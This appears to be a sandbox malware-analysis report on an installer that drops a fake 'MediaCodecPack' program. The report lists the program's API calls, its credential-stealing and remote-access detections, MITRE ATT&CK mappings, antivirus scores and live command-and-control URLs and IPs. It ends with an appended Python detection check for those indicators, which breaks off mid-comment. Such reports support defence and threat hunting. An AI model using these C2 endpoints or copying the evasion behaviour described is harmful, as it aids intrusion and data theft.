                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D1E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02D1E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D05E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,3_2_02D05E5E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D180E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D180E8
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D0E85F cpuid 3_2_02D0E85F
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: mediacodecpack.exe PID: 7404, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2575281871.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: mediacodecpack.exe PID: 7404, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60963143
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,3_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,3_2_6096A38C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_609254B1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6094B407
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6090F435 sqlite3_bind_parameter_index,3_2_6090F435
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,3_2_609255D4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609255FF sqlite3_bind_text,3_2_609255FF
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,3_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,3_2_6094B54C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60925686
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,3_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,3_2_609256E5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092562A sqlite3_bind_blob,3_2_6092562A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,3_2_60925655
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6094C64A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_609687A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,3_2_6092570B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F772
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,3_2_60925778
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090577D sqlite3_bind_parameter_name,3_2_6090577D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090576B sqlite3_bind_parameter_count,3_2_6090576B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,3_2_6094A894
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F883
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,3_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,3_2_6096281E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,3_2_6096583A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,3_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6094A92B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6090EAE5 sqlite3_transfer_bindings,3_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,3_2_6095FB98
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,3_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_60969D75
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,3_2_6095FFB2
MITRE ATT&CK Matrix

Only techniques with at least one matching signature are listed; the number in parentheses is the count of signatures mapped to that technique. The remaining matrix cells in the report are the empty ATT&CK template.

Execution: Native API (2); Command and Scripting Interpreter (2); Service Execution (2)
Persistence: DLL Side-Loading (1); Windows Service (5); Bootkit (1)
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (5); Process Injection (2)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (21); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (121); Access Token Manipulation (1); Process Injection (2); Bootkit (1)
Credential Access: Input Capture (1)
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (35); Security Software Discovery (141); Process Discovery (1); Virtualization/Sandbox Evasion (121); Application Window Discovery (11); System Owner/User Discovery (3); System Network Configuration Discovery (1)
Collection: Archive Collected Data (1); Input Capture (1)
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (12)
Impact: System Shutdown/Reboot (1)

No signature mapped to the Reconnaissance, Resource Development, Initial Access, Lateral Movement or Exfiltration tactics.
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
newwork.exe.1.exe | 16% | ReversingLabs | Win32.Trojan.Munp

Dropped Files
Source | Detection | Scanner
C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | 100% | Joe Sandbox ML
C:\ProgramData\MediaCodecPack\sqlite3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-8I59M.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-JJJFI.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NDPJ4.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-UJAIS.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-VMCDM.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4 | 100% | Avira URL Cloud | malware
https://188.119.66.185/779CB9834B480E8EE1B8DFF231005E9DC5D8267 | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325 | 100% | Avira URL Cloud | malware
https://188.119.66.185/ai/?key=8 | 100% | Avira URL Cloud | malware
https://188.119.66.185/S | 0% | Avira URL Cloud | safe
https://188.119.66.185/en-US | 0% | Avira URL Cloud | safe
https://188.119.66.185/ography | 0% | Avira URL Cloud | safe
https://188.119.66.185/e | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 | 100% | Avira URL Cloud | malware
http://wonderwork.ucoz.com/ | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 | 100% | Avira URL Cloud | malware
https://188.119.66.185/PTKa | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | - | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e30088813250aa158405633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd13484 | false | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.dr | false | - | high
https://188.119.66.185/S | mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4 | mediacodecpack.exe, 00000003.00000002.2572840058.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/779CB9834B480E8EE1B8DFF231005E9DC5D8267 | mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/psU | newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.dr | false | - | high
https://188.119.66.185/ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b82a8dcd6c946851e3008881325 | mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ography | mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/en-US | mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | newwork.exe.1.exe | false | - | high
https://188.119.66.185/ai/?key=8 | mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ | mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://188.119.66.185/en-GB | mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | newwork.exe.1.exe | false | - | high
https://188.119.66.185/e | mediacodecpack.exe, 00000003.00000002.2572840058.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://wonderwork.ucoz.com/ | newwork.exe.1.tmp, 00000001.00000002.2575850575.0000000005ADC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1337100436.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, mediacodecpack.exe.1.dr, is-D6CVE.tmp.1.dr | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/ps | newwork.exe.1.exe, 00000000.00000003.1326087653.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1326248808.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1326674876.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-P1HNB.tmp.1.dr | false | - | high
https://www.easycutstudio.com/support.html | newwork.exe.1.exe, 00000000.00000003.1325798542.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1325714956.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.2573166725.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327471325.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1327811982.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2574636674.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.2573405234.0000000000857000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://188.119.66.185/PTKa | mediacodecpack.exe, 00000003.00000002.2576046673.0000000003370000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

Reputation legend (share of Joe Sandbox submissions that contacted the indicator):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
188.119.66.185 | unknown | Russian Federation | 209499 | FLYNETRU | false
89.105.201.183 | unknown | Netherlands | 24875 | NOVOSERVE-ASNL | false
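The IP and URL tables above are the part of this report that a responder will actually reuse, so here is one way to turn them into a proxy-log check. This is an added example, not Joe Sandbox code and not part of the sample: the two C2 addresses and the /ai/?key= path prefix come from the report, while the log format, the internal client addresses and the log lines themselves are constructed for the example. The key value in the flagged URLs differs between runs (the report lists several), so the check keys on the path prefix rather than on a full URL, and the Microsoft CDN address the sandbox whitelisted is excluded so it never produces an alert.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from this report's IP and URL tables.
C2_HOSTS = {"188.119.66.185", "89.105.201.183"}
# Avira flagged every "/ai/?key=<hex>" URL on 188.119.66.185 as malware; the key
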